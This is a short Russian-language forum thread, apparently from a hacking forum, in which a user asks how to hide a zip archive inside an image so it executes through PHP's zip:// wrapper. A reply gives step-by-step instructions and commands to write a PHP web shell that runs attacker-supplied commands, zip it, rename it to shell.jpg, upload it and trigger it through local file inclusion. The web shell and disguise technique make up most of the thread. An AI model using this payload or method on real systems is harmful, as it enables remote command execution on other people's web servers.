Всем привет! Нужно создать zip архив с папкой и файлом внутри спрятанный в картинке таким образом что бы он сработал при запуски через wrapper zip://
Возможно?
Возможно?
LFI с wrapper ZIP делается примерно так:
Wrapper zip://
- Create an evil payload: echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
- Zip the file
Bash:
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php- Upload the archive and access the file using the wrappers:
Ссылка скрыта от гостей
Обучение наступательной кибербезопасности в игровой форме. Начать игру!